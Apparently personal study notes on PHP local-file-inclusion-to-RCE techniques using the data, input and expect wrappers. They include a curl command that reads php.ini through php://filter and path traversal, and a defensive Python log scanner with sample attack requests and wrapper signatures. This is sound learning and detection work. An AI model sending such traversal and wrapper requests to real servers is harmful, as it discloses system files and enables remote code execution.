RCE

the PHP data wrapper can be used to include external data, including PHP code. the data wrapper can only be used in an attack if the "allow_url_include" setting is enabled in the PHP configuration.

METHOD 1: DATA WRAPPER

#read the PHP configuration file through the LFI vulnerability
root@oco:~$ curl "http://<SERVER_IP>:<PORT>/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini"
 <!DOCTYPE html>
  <html lang="en">
   ...SNIP...
   <h2>Containers</h2>W1BIUF0KCjs7Ozs7Ozs7O
   ...SNIP...4KO2ZmaS5wcmVsb2FkPQo=<p class="read-more">

 * configuration file default location
    - apache: /etc/php/{phpVersion}/apache2/php.ini
    - nginx: /etc/php/{phpVersion}/fpm/php.ini
 
 * the PHP version in the path is unknown, so start with the latest PHP version and move to earlier versions until the file is found
 
 * the base64 filter must be used in order not to break the output, since the raw ini file would otherwise be rendered inside the HTML page
 
root@oco:~$ echo 'W1BIUF0KCjs7Ozs7Ozs7O...SNIP...4KO2ZmaS5wcmVsb2FkPQo=' | base64 -d | grep allow_url_include
 allow_url_include = On
 
 * this option is not enabled by default, and is required for several other LFI attacks

METHOD 2: INPUT WRAPPER

similar to the data wrapper, the input wrapper can be used to include external input and execute PHP code. the main difference is that the input is passed in the body of a POST request to the input wrapper, as opposed to the GET request used by the data wrapper. this wrapper also requires the "allow_url_include" setting to be enabled, and the vulnerable parameter must accept POST requests for this attack to work.

METHOD 3: EXPECT WRAPPER

the expect wrapper allows commands to be run directly through URL streams. it works similarly to the previous two wrappers, but doesn't require an actual web shell as part of the payload, as it is designed to execute arbitrary commands. this is an external wrapper that is not part of a default PHP install and needs to be manually installed and enabled on the back-end server.
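on the defensive side, all three methods leave the wrapper scheme in the request URL, so they can be spotted in the web server access log. the following detector is an added example, not part of the original notes: the log lines are constructed, and the rule labels and function names are my own.

```python
import re
from urllib.parse import unquote

# Constructed Apache-style access-log lines (not real traffic): one benign
# request, then one line per wrapper from the notes, and a double-encoded one.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?language=es.php HTTP/1.1" 200 1337
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini HTTP/1.1" 200 9001
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "POST /index.php?language=php://input HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?language=data://text/plain;base64,Zm9v HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?language=expect://id HTTP/1.1" 200 64
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /index.php?language=php%253A%252F%252Finput HTTP/1.1" 200 512
"""

REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/')

# Scheme prefixes checked against each fully URL-decoded query value, so single
# or double percent-encoding of the scheme does not evade the rule.
WRAPPER_SIGNATURES = (
    ("php://filter", "file disclosure via php://filter"),
    ("php://input", "code execution via php://input (allow_url_include=On)"),
    ("data:", "code execution via data wrapper (allow_url_include=On)"),
    ("expect:", "command execution via expect wrapper (expect extension)"),
)

def fully_decode(value: str) -> str:
    """Undo repeated percent-encoding until the string stops changing."""
    while (decoded := unquote(value)) != value:
        value = decoded
    return value.lower()

def classify_request(target: str) -> list[str]:
    """Name every wrapper technique whose scheme starts a query value."""
    findings = []
    for pair in target.partition("?")[2].split("&"):
        value = fully_decode(pair.partition("=")[2])
        findings += [label for prefix, label in WRAPPER_SIGNATURES if value.startswith(prefix)]
        if "../" in value:
            findings.append("path traversal")
    return findings

def scan_log(log_text: str) -> list[tuple[str, list[str]]]:
    """Return (request target, findings) for each log line that trips a rule."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if m and (findings := classify_request(m.group("target"))):
            hits.append((m.group("target"), findings))
    return hits
```

running scan_log(SAMPLE_LOG) flags five of the six lines; the double-encoded request is still classified as php://input because the value is decoded until stable before the prefix check.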
